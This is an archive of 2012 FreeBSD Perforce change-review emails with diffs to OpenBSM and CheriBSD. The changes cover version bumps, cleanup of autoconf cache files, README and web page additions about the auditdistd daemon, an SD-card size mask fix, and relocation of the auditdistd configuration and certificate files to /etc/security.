-9321,6 +9342,8 @@ # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. +# serial 6 + # _AM_MANGLE_OPTION(NAME) # ----------------------- AC_DEFUN([_AM_MANGLE_OPTION], @@ -9352,6 +9375,8 @@ # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. +# serial 9 + # AM_SANITY_CHECK # --------------- AC_DEFUN([AM_SANITY_CHECK], @@ -9433,6 +9458,8 @@ # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. +# serial 2 + # AM_PROG_INSTALL_STRIP # --------------------- # One issue with vendor 'install' (even GNU) is that you can't @@ -9461,6 +9488,8 @@ # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. +# serial 3 + # _AM_SUBST_NOTMAKE(VARIABLE) # --------------------------- # Prevent Automake from outputting VARIABLE = @VARIABLE@ in Makefile.in. @@ -9480,6 +9509,8 @@ # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. +# serial 3 + # _AM_PROG_TAR(FORMAT) # -------------------- # Check how to create a tarball in format FORMAT. ==== //depot/projects/trustedbsd/openbsm/autom4te.cache/output.0#2 (text+ko) ==== @@ -1,7 +1,7 @@ @%:@! /bin/sh @%:@ From configure.ac P4: //depot/projects/trustedbsd/openbsm/configure.ac#62 . @%:@ Guess values for system-dependent variables and create Makefiles. -@%:@ Generated by GNU Autoconf 2.69 for OpenBSM 1.2alpha1. +@%:@ Generated by GNU Autoconf 2.69 for OpenBSM 1.2alpha2. @%:@ @%:@ Report bugs to . @%:@ @@ -591,8 +591,8 @@ # Identity of this package. PACKAGE_NAME='OpenBSM' PACKAGE_TARNAME='openbsm' -PACKAGE_VERSION='1.2alpha1' -PACKAGE_STRING='OpenBSM 1.2alpha1' +PACKAGE_VERSION='1.2alpha2' +PACKAGE_STRING='OpenBSM 1.2alpha2' PACKAGE_BUGREPORT='trustedbsd-audit@TrustesdBSD.org' PACKAGE_URL='' @@ -1327,7 +1327,7 @@ # Omit some internal or obsolete options to make the list less imposing. # This message is too long to be a string in the A/UX 3.1 sh. cat <<_ACEOF -\`configure' configures OpenBSM 1.2alpha1 to adapt to many kinds of systems. +\`configure' configures OpenBSM 1.2alpha2 to adapt to many kinds of systems. Usage: $0 [OPTION]... [VAR=VALUE]... @@ -1397,7 +1397,7 @@ if test -n "$ac_init_help"; then case $ac_init_help in - short | recursive ) echo "Configuration of OpenBSM 1.2alpha1:";; + short | recursive ) echo "Configuration of OpenBSM 1.2alpha2:";; esac cat <<\_ACEOF @@ -1511,7 +1511,7 @@ test -n "$ac_init_help" && exit $ac_status if $ac_init_version; then cat <<\_ACEOF -OpenBSM configure 1.2alpha1 +OpenBSM configure 1.2alpha2 generated by GNU Autoconf 2.69 Copyright (C) 2012 Free Software Foundation, Inc. @@ -1991,7 +1991,7 @@ This file contains any messages produced by compilers while running configure, to aid debugging if configure makes a mistake. -It was created by OpenBSM $as_me 1.2alpha1, which was +It was created by OpenBSM $as_me 1.2alpha2, which was generated by GNU Autoconf 2.69. Invocation command line was $ $0 $@ @@ -11556,7 +11556,7 @@ # Define the identity of the package. PACKAGE=OpenBSM - VERSION=1.2alpha1 + VERSION=1.2alpha2 cat >>confdefs.h <<_ACEOF @@ -14176,7 +14176,7 @@ # report actual input values of CONFIG_FILES etc. instead of their # values after options handling. ac_log=" -This file was extended by OpenBSM $as_me 1.2alpha1, which was +This file was extended by OpenBSM $as_me 1.2alpha2, which was generated by GNU Autoconf 2.69. Invocation command line was CONFIG_FILES = $CONFIG_FILES @@ -14242,7 +14242,7 @@ cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1 ac_cs_config="`$as_echo "$ac_configure_args" | sed 's/^ //; s/[\\""\`\$]/\\\\&/g'`" ac_cs_version="\\ -OpenBSM config.status 1.2alpha1 +OpenBSM config.status 1.2alpha2 configured by $0, generated by GNU Autoconf 2.69, with options \\"\$ac_cs_config\\" ==== //depot/projects/trustedbsd/openbsm/autom4te.cache/traces.0#2 (text+ko) ==== @@ -2400,7 +2400,7 @@ m4trace:configure.ac:32: -1- m4_pattern_allow([^YACC$]) m4trace:configure.ac:32: -1- m4_pattern_allow([^YACC$]) m4trace:configure.ac:32: -1- m4_pattern_allow([^YFLAGS$]) -m4trace:configure.ac:34: -1- AM_INIT_AUTOMAKE([OpenBSM], [1.2alpha1]) +m4trace:configure.ac:34: -1- AM_INIT_AUTOMAKE([OpenBSM], [1.2alpha2]) m4trace:configure.ac:34: -1- m4_pattern_allow([^AM_[A-Z]+FLAGS$]) m4trace:configure.ac:34: -1- AM_SET_CURRENT_AUTOMAKE_VERSION m4trace:configure.ac:34: -1- AM_AUTOMAKE_VERSION([1.12.2]) ==== //depot/projects/trustedbsd/openbsm/bin/auditdistd/parse.y#3 (text+ko) ==== @@ -27,7 +27,7 @@ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * - * $P4: //depot/projects/trustedbsd/openbsm/bin/auditdistd/parse.y#2 $ + * $P4: //depot/projects/trustedbsd/openbsm/bin/auditdistd/parse.y#3 $ */ #include "config.h" ==== //depot/projects/trustedbsd/openbsm/configure#66 (xtext) ==== @@ -1,7 +1,7 @@ #! /bin/sh # From configure.ac P4: //depot/projects/trustedbsd/openbsm/configure.ac#62 . # Guess values for system-dependent variables and create Makefiles. -# Generated by GNU Autoconf 2.69 for OpenBSM 1.2alpha1. +# Generated by GNU Autoconf 2.69 for OpenBSM 1.2alpha2. # # Report bugs to . # @@ -591,8 +591,8 @@ # Identity of this package. PACKAGE_NAME='OpenBSM' PACKAGE_TARNAME='openbsm' -PACKAGE_VERSION='1.2alpha1' -PACKAGE_STRING='OpenBSM 1.2alpha1' +PACKAGE_VERSION='1.2alpha2' +PACKAGE_STRING='OpenBSM 1.2alpha2' PACKAGE_BUGREPORT='trustedbsd-audit@TrustesdBSD.org' PACKAGE_URL='' @@ -1327,7 +1327,7 @@ # Omit some internal or obsolete options to make the list less imposing. # This message is too long to be a string in the A/UX 3.1 sh. cat <<_ACEOF -\`configure' configures OpenBSM 1.2alpha1 to adapt to many kinds of systems. +\`configure' configures OpenBSM 1.2alpha2 to adapt to many kinds of systems. Usage: $0 [OPTION]... [VAR=VALUE]... @@ -1397,7 +1397,7 @@ if test -n "$ac_init_help"; then case $ac_init_help in - short | recursive ) echo "Configuration of OpenBSM 1.2alpha1:";; + short | recursive ) echo "Configuration of OpenBSM 1.2alpha2:";; esac cat <<\_ACEOF @@ -1511,7 +1511,7 @@ test -n "$ac_init_help" && exit $ac_status if $ac_init_version; then cat <<\_ACEOF -OpenBSM configure 1.2alpha1 +OpenBSM configure 1.2alpha2 generated by GNU Autoconf 2.69 Copyright (C) 2012 Free Software Foundation, Inc. @@ -1991,7 +1991,7 @@ This file contains any messages produced by compilers while running configure, to aid debugging if configure makes a mistake. -It was created by OpenBSM $as_me 1.2alpha1, which was +It was created by OpenBSM $as_me 1.2alpha2, which was generated by GNU Autoconf 2.69. Invocation command line was $ $0 $@ @@ -11552,7 +11552,7 @@ # Define the identity of the package. PACKAGE=OpenBSM - VERSION=1.2alpha1 + VERSION=1.2alpha2 cat >>confdefs.h <<_ACEOF @@ -14172,7 +14172,7 @@ # report actual input values of CONFIG_FILES etc. instead of their # values after options handling. ac_log=" -This file was extended by OpenBSM $as_me 1.2alpha1, which was +This file was extended by OpenBSM $as_me 1.2alpha2, which was generated by GNU Autoconf 2.69. Invocation command line was CONFIG_FILES = $CONFIG_FILES @@ -14238,7 +14238,7 @@ cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1 ac_cs_config="`$as_echo "$ac_configure_args" | sed 's/^ //; s/[\\""\`\$]/\\\\&/g'`" ac_cs_version="\\ -OpenBSM config.status 1.2alpha1 +OpenBSM config.status 1.2alpha2 configured by $0, generated by GNU Autoconf 2.69, with options \\"\$ac_cs_config\\" From owner-p4-projects@FreeBSD.ORG Tue Nov 20 12:10:36 2012 Return-Path: Delivered-To: p4-projects@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 32767) id 2AB4C8FD; Tue, 20 Nov 2012 12:10:36 +0000 (UTC) Delivered-To: perforce@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id DBD778FB for ; Tue, 20 Nov 2012 12:10:35 +0000 (UTC) (envelope-from bb+lists.freebsd.perforce@cyrus.watson.org) Received: from skunkworks.freebsd.org (skunkworks.freebsd.org [IPv6:2001:4f8:fff6::2d]) by mx1.freebsd.org (Postfix) with ESMTP id A8AB08FC18 for ; Tue, 20 Nov 2012 12:10:35 +0000 (UTC) Received: from skunkworks.freebsd.org (localhost [127.0.0.1]) by skunkworks.freebsd.org (8.14.5/8.14.5) with ESMTP id qAKCAZBJ025991 for ; Tue, 20 Nov 2012 12:10:35 GMT (envelope-from bb+lists.freebsd.perforce@cyrus.watson.org) Received: (from perforce@localhost) by skunkworks.freebsd.org (8.14.5/8.14.5/Submit) id qAKCAZgM025988 for perforce@freebsd.org; Tue, 20 Nov 2012 12:10:35 GMT (envelope-from bb+lists.freebsd.perforce@cyrus.watson.org) Date: Tue, 20 Nov 2012 12:10:35 GMT Message-Id: <201211201210.qAKCAZgM025988@skunkworks.freebsd.org> X-Authentication-Warning: skunkworks.freebsd.org: perforce set sender to bb+lists.freebsd.perforce@cyrus.watson.org using -f From: Robert Watson Subject: PERFORCE change 219815 for review To: Perforce Change Reviews Precedence: bulk X-BeenThere: p4-projects@freebsd.org X-Mailman-Version: 2.1.14 List-Id: p4 projects tree changes List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 20 Nov 2012 12:10:36 -0000 http://p4web.freebsd.org/@@219815?ac=10 Change 219815 by rwatson@rwatson_cinnamon on 2012/11/20 12:10:02 Remove autom4te.cache from P4; shouldn't be there. Affected files ... .. //depot/projects/trustedbsd/openbsm/autom4te.cache/output.0#3 delete .. //depot/projects/trustedbsd/openbsm/autom4te.cache/requests#2 delete .. //depot/projects/trustedbsd/openbsm/autom4te.cache/traces.0#3 delete Differences ... From owner-p4-projects@FreeBSD.ORG Tue Nov 20 12:21:48 2012 Return-Path: Delivered-To: p4-projects@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 32767) id E374616B; Tue, 20 Nov 2012 12:21:47 +0000 (UTC) Delivered-To: perforce@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 9E785169 for ; Tue, 20 Nov 2012 12:21:47 +0000 (UTC) (envelope-from bb+lists.freebsd.perforce@cyrus.watson.org) Received: from skunkworks.freebsd.org (skunkworks.freebsd.org [IPv6:2001:4f8:fff6::2d]) by mx1.freebsd.org (Postfix) with ESMTP id 835AA8FC17 for ; Tue, 20 Nov 2012 12:21:47 +0000 (UTC) Received: from skunkworks.freebsd.org (localhost [127.0.0.1]) by skunkworks.freebsd.org (8.14.5/8.14.5) with ESMTP id qAKCLlbH027086 for ; Tue, 20 Nov 2012 12:21:47 GMT (envelope-from bb+lists.freebsd.perforce@cyrus.watson.org) Received: (from perforce@localhost) by skunkworks.freebsd.org (8.14.5/8.14.5/Submit) id qAKCLlvN027083 for perforce@freebsd.org; Tue, 20 Nov 2012 12:21:47 GMT (envelope-from bb+lists.freebsd.perforce@cyrus.watson.org) Date: Tue, 20 Nov 2012 12:21:47 GMT Message-Id: <201211201221.qAKCLlvN027083@skunkworks.freebsd.org> X-Authentication-Warning: skunkworks.freebsd.org: perforce set sender to bb+lists.freebsd.perforce@cyrus.watson.org using -f From: Robert Watson Subject: PERFORCE change 219816 for review To: Perforce Change Reviews Precedence: bulk X-BeenThere: p4-projects@freebsd.org X-Mailman-Version: 2.1.14 List-Id: p4 projects tree changes List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 20 Nov 2012 12:21:48 -0000 http://p4web.freebsd.org/@@219816?ac=10 Change 219816 by rwatson@rwatson_cinnamon on 2012/11/20 12:20:58 Add auditdistd to the list of contents in OpenBSM. Affected files ... .. //depot/projects/trustedbsd/openbsm/README#40 edit Differences ... ==== //depot/projects/trustedbsd/openbsm/README#40 (text+ko) ==== @@ -38,6 +38,7 @@ audit Command line audit control tool auditd Audit management daemon + auditdistd Audit trail distribution daemon auditfilterd Experimental event monitoring framework auditreduce Audit trail reduction tool audump Debugging tool to parse and print audit databases @@ -64,4 +65,4 @@ http://www.TrustedBSD.org/ -$P4: //depot/projects/trustedbsd/openbsm/README#39 $ +$P4: //depot/projects/trustedbsd/openbsm/README#40 $ From owner-p4-projects@FreeBSD.ORG Tue Nov 20 12:23:50 2012 Return-Path: Delivered-To: p4-projects@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 32767) id 5311D59C; Tue, 20 Nov 2012 12:23:50 +0000 (UTC) Delivered-To: perforce@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 1404359A for ; Tue, 20 Nov 2012 12:23:50 +0000 (UTC) (envelope-from bb+lists.freebsd.perforce@cyrus.watson.org) Received: from skunkworks.freebsd.org (skunkworks.freebsd.org [IPv6:2001:4f8:fff6::2d]) by mx1.freebsd.org (Postfix) with ESMTP id EDC068FC15 for ; Tue, 20 Nov 2012 12:23:49 +0000 (UTC) Received: from skunkworks.freebsd.org (localhost [127.0.0.1]) by skunkworks.freebsd.org (8.14.5/8.14.5) with ESMTP id qAKCNnLD027185 for ; Tue, 20 Nov 2012 12:23:49 GMT (envelope-from bb+lists.freebsd.perforce@cyrus.watson.org) Received: (from perforce@localhost) by skunkworks.freebsd.org (8.14.5/8.14.5/Submit) id qAKCNnqp027181 for perforce@freebsd.org; Tue, 20 Nov 2012 12:23:49 GMT (envelope-from bb+lists.freebsd.perforce@cyrus.watson.org) Date: Tue, 20 Nov 2012 12:23:49 GMT Message-Id: <201211201223.qAKCNnqp027181@skunkworks.freebsd.org> X-Authentication-Warning: skunkworks.freebsd.org: perforce set sender to bb+lists.freebsd.perforce@cyrus.watson.org using -f From: Robert Watson Subject: PERFORCE change 219817 for review To: Perforce Change Reviews Precedence: bulk X-BeenThere: p4-projects@freebsd.org X-Mailman-Version: 2.1.14 List-Id: p4 projects tree changes List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 20 Nov 2012 12:23:50 -0000 http://p4web.freebsd.org/@@219817?ac=10 Change 219817 by rwatson@rwatson_cinnamon on 2012/11/20 12:22:48 Add a TODO for client certificate support; right now only passwords are supported for authenticating audit clients. Affected files ... .. //depot/projects/trustedbsd/openbsm/TODO#14 edit Differences ... ==== //depot/projects/trustedbsd/openbsm/TODO#14 (text+ko) ==== @@ -21,5 +21,7 @@ alternative locations can be used. - NLS support for au_strerror(3), which provides error strings for BSM errors not available on the local OS platform. +- Support for client certificates in auditdistd, to include certificate chain + validation. -$P4: //depot/projects/trustedbsd/openbsm/TODO#13 $ +$P4: //depot/projects/trustedbsd/openbsm/TODO#14 $ From owner-p4-projects@FreeBSD.ORG Tue Nov 20 12:30:58 2012 Return-Path: Delivered-To: p4-projects@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 32767) id 2C84D820; Tue, 20 Nov 2012 12:30:58 +0000 (UTC) Delivered-To: perforce@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id D980D81E for ; Tue, 20 Nov 2012 12:30:57 +0000 (UTC) (envelope-from bb+lists.freebsd.perforce@cyrus.watson.org) Received: from skunkworks.freebsd.org (skunkworks.freebsd.org [IPv6:2001:4f8:fff6::2d]) by mx1.freebsd.org (Postfix) with ESMTP id A4B3C8FC12 for ; Tue, 20 Nov 2012 12:30:57 +0000 (UTC) Received: from skunkworks.freebsd.org (localhost [127.0.0.1]) by skunkworks.freebsd.org (8.14.5/8.14.5) with ESMTP id qAKCUvX1027342 for ; Tue, 20 Nov 2012 12:30:57 GMT (envelope-from bb+lists.freebsd.perforce@cyrus.watson.org) Received: (from perforce@localhost) by skunkworks.freebsd.org (8.14.5/8.14.5/Submit) id qAKCUvBi027339 for perforce@freebsd.org; Tue, 20 Nov 2012 12:30:57 GMT (envelope-from bb+lists.freebsd.perforce@cyrus.watson.org) Date: Tue, 20 Nov 2012 12:30:57 GMT Message-Id: <201211201230.qAKCUvBi027339@skunkworks.freebsd.org> X-Authentication-Warning: skunkworks.freebsd.org: perforce set sender to bb+lists.freebsd.perforce@cyrus.watson.org using -f From: Robert Watson Subject: PERFORCE change 219818 for review To: Perforce Change Reviews Precedence: bulk X-BeenThere: p4-projects@freebsd.org X-Mailman-Version: 2.1.14 List-Id: p4 projects tree changes List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 20 Nov 2012 12:30:58 -0000 http://p4web.freebsd.org/@@219818?ac=10 Change 219818 by rwatson@rwatson_fledge on 2012/11/20 12:30:34 Add information on auditdistd and FreeBSD Foundation sponsorship to the TrustedBSD audit and OpenBSM pages. Affected files ... .. //depot/projects/trustedbsd/www/audit.page#11 edit .. //depot/projects/trustedbsd/www/openbsm.page#42 edit Differences ... ==== //depot/projects/trustedbsd/www/audit.page#11 (text+ko) ==== @@ -29,7 +29,7 @@ - $P4: //depot/projects/trustedbsd/www/audit.page#10 $ + $P4: //depot/projects/trustedbsd/www/audit.page#11 $ @@ -84,7 +84,9 @@

The TrustedBSD Project greatfully acknowledges Apple Computer, Inc., for its generous donation of the Darwin audit implementation under a - BSD license.

+ BSD license. + The FreeBSD Foundation sponsored development of auditdistd, a + distributed audit trail daemon.

==== //depot/projects/trustedbsd/www/openbsm.page#42 (text+ko) ==== @@ -30,7 +30,7 @@ - $P4: //depot/projects/trustedbsd/www/openbsm.page#41 $ + $P4: //depot/projects/trustedbsd/www/openbsm.page#42 $ @@ -66,8 +66,10 @@

The OpenBSM distribution provides system include files, the libbsm library, command-line tools such as praudit and auditreduce, sample - /etc configuration files, and an audit daemon for use on systems with - kernel support. + /etc configuration files, an audit daemon for use on systems with + kernel support, and an audit trail distribution daemon to allow + trails to be securely submitted by end hosts to a central audit trail + server (to appear in OpenBSM 1.2). It is appropriate for use stand-alone in processing trails generated by BSM-enabled systems, as well as for use as the foundation of OS audit implementations requiring libraries, command-line tools, @@ -93,7 +95,9 @@ Apple under a BSD license. The Darwin BSM implementation was created by McAfee Research under contract to Apple Computer, and has since been maintained and - extended by the volunteer TrustedBSD team.

+ extended by the volunteer TrustedBSD team. + The FreeBSD Foundation sponsored the development of auditdistd, a + distributed audit trail daemon.

OpenBSM is the core user space component of the TrustedBSD Audit Implementation for From owner-p4-projects@FreeBSD.ORG Tue Nov 20 21:43:30 2012 Return-Path: Delivered-To: p4-projects@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 32767) id 17BA769C; Tue, 20 Nov 2012 21:43:30 +0000 (UTC) Delivered-To: perforce@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id CACBD69A for ; Tue, 20 Nov 2012 21:43:29 +0000 (UTC) (envelope-from brooks@freebsd.org) Received: from skunkworks.freebsd.org (skunkworks.freebsd.org [IPv6:2001:4f8:fff6::2d]) by mx1.freebsd.org (Postfix) with ESMTP id B189A8FC0C for ; Tue, 20 Nov 2012 21:43:29 +0000 (UTC) Received: from skunkworks.freebsd.org (localhost [127.0.0.1]) by skunkworks.freebsd.org (8.14.5/8.14.5) with ESMTP id qAKLhTee047366 for ; Tue, 20 Nov 2012 21:43:29 GMT (envelope-from brooks@freebsd.org) Received: (from perforce@localhost) by skunkworks.freebsd.org (8.14.5/8.14.5/Submit) id qAKLhT3O047363 for perforce@freebsd.org; Tue, 20 Nov 2012 21:43:29 GMT (envelope-from brooks@freebsd.org) Date: Tue, 20 Nov 2012 21:43:29 GMT Message-Id: <201211202143.qAKLhT3O047363@skunkworks.freebsd.org> X-Authentication-Warning: skunkworks.freebsd.org: perforce set sender to brooks@freebsd.org using -f From: Brooks Davis Subject: PERFORCE change 219819 for review To: Perforce Change Reviews Precedence: bulk X-BeenThere: p4-projects@freebsd.org X-Mailman-Version: 2.1.14 List-Id: p4 projects tree changes List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 20 Nov 2012 21:43:30 -0000 http://p4web.freebsd.org/@@219819?ac=10 Change 219819 by brooks@brooks_zenith on 2012/11/20 21:42:31 Remove a duplicate computation of C_SIZE_MULT. Once is sufficient. Affected files ... .. //depot/projects/ctsrd/cheribsd/src/sys/dev/altera/sdcard/altera_sdcard_io.c#4 edit Differences ... ==== //depot/projects/ctsrd/cheribsd/src/sys/dev/altera/sdcard/altera_sdcard_io.c#4 (text+ko) ==== @@ -93,13 +93,6 @@ read_bl_len = sc->as_csd.csd_data[ALTERA_SDCARD_CSD_READ_BL_LEN_BYTE]; read_bl_len &= ALTERA_SDCARD_CSD_READ_BL_LEN_MASK; - byte0 = sc->as_csd.csd_data[ALTERA_SDCARD_CSD_C_SIZE_MULT_BYTE0]; - byte0 &= ALTERA_SDCARD_CSD_C_SIZE_MULT_MASK0; - byte1 = sc->as_csd.csd_data[ALTERA_SDCARD_CSD_C_SIZE_MULT_BYTE1]; - byte1 &= ALTERA_SDCARD_CSD_C_SIZE_MULT_MASK1; - c_size_mult = (byte0 >> ALTERA_SDCARD_CSD_C_SIZE_MULT_RSHIFT0) | - (byte0 << ALTERA_SDCARD_CSD_C_SIZE_MULT_LSHIFT1); - byte0 = sc->as_csd.csd_data[ALTERA_SDCARD_CSD_C_SIZE_BYTE0]; byte0 &= ALTERA_SDCARD_CSD_C_SIZE_MASK0; byte1 = sc->as_csd.csd_data[ALTERA_SDCARD_CSD_C_SIZE_BYTE1]; From owner-p4-projects@FreeBSD.ORG Tue Nov 20 21:46:33 2012 Return-Path: Delivered-To: p4-projects@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 32767) id A5AB57C0; Tue, 20 Nov 2012 21:46:33 +0000 (UTC) Delivered-To: perforce@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 474CC7BE for ; Tue, 20 Nov 2012 21:46:33 +0000 (UTC) (envelope-from brooks@freebsd.org) Received: from skunkworks.freebsd.org (skunkworks.freebsd.org [IPv6:2001:4f8:fff6::2d]) by mx1.freebsd.org (Postfix) with ESMTP id 296AD8FC08 for ; Tue, 20 Nov 2012 21:46:33 +0000 (UTC) Received: from skunkworks.freebsd.org (localhost [127.0.0.1]) by skunkworks.freebsd.org (8.14.5/8.14.5) with ESMTP id qAKLkXtN047440 for ; Tue, 20 Nov 2012 21:46:33 GMT (envelope-from brooks@freebsd.org) Received: (from perforce@localhost) by skunkworks.freebsd.org (8.14.5/8.14.5/Submit) id qAKLkWu3047437 for perforce@freebsd.org; Tue, 20 Nov 2012 21:46:32 GMT (envelope-from brooks@freebsd.org) Date: Tue, 20 Nov 2012 21:46:32 GMT Message-Id: <201211202146.qAKLkWu3047437@skunkworks.freebsd.org> X-Authentication-Warning: skunkworks.freebsd.org: perforce set sender to brooks@freebsd.org using -f From: Brooks Davis Subject: PERFORCE change 219820 for review To: Perforce Change Reviews Precedence: bulk X-BeenThere: p4-projects@freebsd.org X-Mailman-Version: 2.1.14 List-Id: p4 projects tree changes List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 20 Nov 2012 21:46:33 -0000 http://p4web.freebsd.org/@@219820?ac=10 Change 219820 by brooks@brooks_zenith on 2012/11/20 21:46:30 Add a missing 0 to the mask for byte0 of C_SIZE. The previous mask (0xc) worked except that the last 0-1536K of the disk could not be accessed since we were shifting the (wrong) bits we did mask off the right edge. Affected files ... .. //depot/projects/ctsrd/cheribsd/src/sys/dev/altera/sdcard/altera_sdcard.h#3 edit Differences ... ==== //depot/projects/ctsrd/cheribsd/src/sys/dev/altera/sdcard/altera_sdcard.h#3 (text+ko) ==== @@ -138,7 +138,7 @@ * data. Software ease of use was not a design consideration. */ #define ALTERA_SDCARD_CSD_C_SIZE_BYTE0 7 -#define ALTERA_SDCARD_CSD_C_SIZE_MASK0 0xc /* top 2 bits */ +#define ALTERA_SDCARD_CSD_C_SIZE_MASK0 0xc0 /* top 2 bits */ #define ALTERA_SDCARD_CSD_C_SIZE_RSHIFT0 6 #define ALTERA_SDCARD_CSD_C_SIZE_BYTE1 8 From owner-p4-projects@FreeBSD.ORG Tue Nov 20 23:01:51 2012 Return-Path: Delivered-To: p4-projects@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 32767) id 71CC0340; Tue, 20 Nov 2012 23:01:51 +0000 (UTC) Delivered-To: perforce@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 16BE133E for ; Tue, 20 Nov 2012 23:01:51 +0000 (UTC) (envelope-from pjd@freebsd.org) Received: from skunkworks.freebsd.org (skunkworks.freebsd.org [IPv6:2001:4f8:fff6::2d]) by mx1.freebsd.org (Postfix) with ESMTP id F0F328FC16 for ; Tue, 20 Nov 2012 23:01:50 +0000 (UTC) Received: from skunkworks.freebsd.org (localhost [127.0.0.1]) by skunkworks.freebsd.org (8.14.5/8.14.5) with ESMTP id qAKN1oqk050034 for ; Tue, 20 Nov 2012 23:01:50 GMT (envelope-from pjd@freebsd.org) Received: (from perforce@localhost) by skunkworks.freebsd.org (8.14.5/8.14.5/Submit) id qAKN1oRf050031 for perforce@freebsd.org; Tue, 20 Nov 2012 23:01:50 GMT (envelope-from pjd@freebsd.org) Date: Tue, 20 Nov 2012 23:01:50 GMT Message-Id: <201211202301.qAKN1oRf050031@skunkworks.freebsd.org> X-Authentication-Warning: skunkworks.freebsd.org: perforce set sender to pjd@freebsd.org using -f From: Pawel Jakub Dawidek Subject: PERFORCE change 219821 for review To: Perforce Change Reviews Precedence: bulk X-BeenThere: p4-projects@freebsd.org X-Mailman-Version: 2.1.14 List-Id: p4 projects tree changes List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 20 Nov 2012 23:01:51 -0000 http://p4web.freebsd.org/@@219821?ac=10 Change 219821 by pjd@pjd_anger on 2012/11/20 23:01:32 Move default location of the configuration file, certificate file and private key file from /etc/ to /etc/security/. Requested by: rwatson Affected files ... .. //depot/projects/trustedbsd/openbsm/bin/auditdistd/auditdistd.8#2 edit .. //depot/projects/trustedbsd/openbsm/bin/auditdistd/auditdistd.conf.5#2 edit .. //depot/projects/trustedbsd/openbsm/bin/auditdistd/auditdistd.h#2 edit Differences ... ==== //depot/projects/trustedbsd/openbsm/bin/auditdistd/auditdistd.8#2 (text+ko) ==== @@ -51,7 +51,7 @@ .It Fl c Ar config Specify alternative location of the configuration file. The default location is -.Pa /etc/auditdistd.conf . +.Pa /etc/security/auditdistd.conf . .It Fl d Print or log debugging information. This option can be specified multiple times to raise the verbosity @@ -77,8 +77,8 @@ .Pa /var/run/auditdistd.pid . .El .Sh FILES -.Bl -tag -width ".Pa /var/run/auditdistd.pid" -compact -.It Pa /etc/auditdistd.conf +.Bl -tag -width ".Pa /etc/security/auditdistd.conf" -compact +.It Pa /etc/security/auditdistd.conf The configuration file for .Nm . .It Pa /var/run/auditdistd.pid ==== //depot/projects/trustedbsd/openbsm/bin/auditdistd/auditdistd.conf.5#2 (text+ko) ==== @@ -126,11 +126,11 @@ directory "" # Path to receiver's certificate file. - # The default is "/etc/auditdistd.cert.pem". + # The default is "/etc/security/auditdistd.cert.pem". certfile "" # Path to receiver's private key file. - # The default is "/etc/auditdistd.key.pem". + # The default is "/etc/security/auditdistd.key.pem". keyfile "" # Configuration for a source system we want to receive audit trail @@ -307,15 +307,15 @@ Certificate public key's fingerprint ready to be pasted into auditdistd configuration file can be obtained by running: .Bd -literal -offset -# openssl x509 -in /etc/auditdistd.cert.pem -noout -fingerprint -sha256 | awk -F '[ =]' '{printf("%s=%s\\n", $1, $3)}' +# openssl x509 -in /etc/security/auditdistd.cert.pem -noout -fingerprint -sha256 | awk -F '[ =]' '{printf("%s=%s\\n", $1, $3)}' .Ed .It Ic password Aq password .Pp Password used to authenticate the sender in front of the receiver. .El .Sh FILES -.Bl -tag -width ".Pa /etc/auditdistd.conf" -compact -.It Pa /etc/auditdistd.conf +.Bl -tag -width ".Pa /etc/security/auditdistd.conf" -compact +.It Pa /etc/security/auditdistd.conf The default .Nm auditdistd configuration file. ==== //depot/projects/trustedbsd/openbsm/bin/auditdistd/auditdistd.h#2 (text+ko) ==== @@ -26,7 +26,7 @@ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * - * $P4: //depot/projects/trustedbsd/openbsm/bin/auditdistd/auditdistd.h#1 $ + * $P4: //depot/projects/trustedbsd/openbsm/bin/auditdistd/auditdistd.h#2 $ */ #ifndef _AUDITDISTD_H_ @@ -62,15 +62,15 @@ #define ADIST_USER "auditdistd" #define ADIST_TIMEOUT 20 -#define ADIST_CONFIG "/etc/auditdistd.conf" +#define ADIST_CONFIG "/etc/security/auditdistd.conf" #define ADIST_TCP_PORT "7878" #define ADIST_LISTEN_TLS_TCP4 "tls://0.0.0.0:" ADIST_TCP_PORT #define ADIST_LISTEN_TLS_TCP6 "tls://[::]:" ADIST_TCP_PORT #define ADIST_PIDFILE "/var/run/auditdistd.pid" #define ADIST_DIRECTORY_SENDER "/var/audit/dist" #define 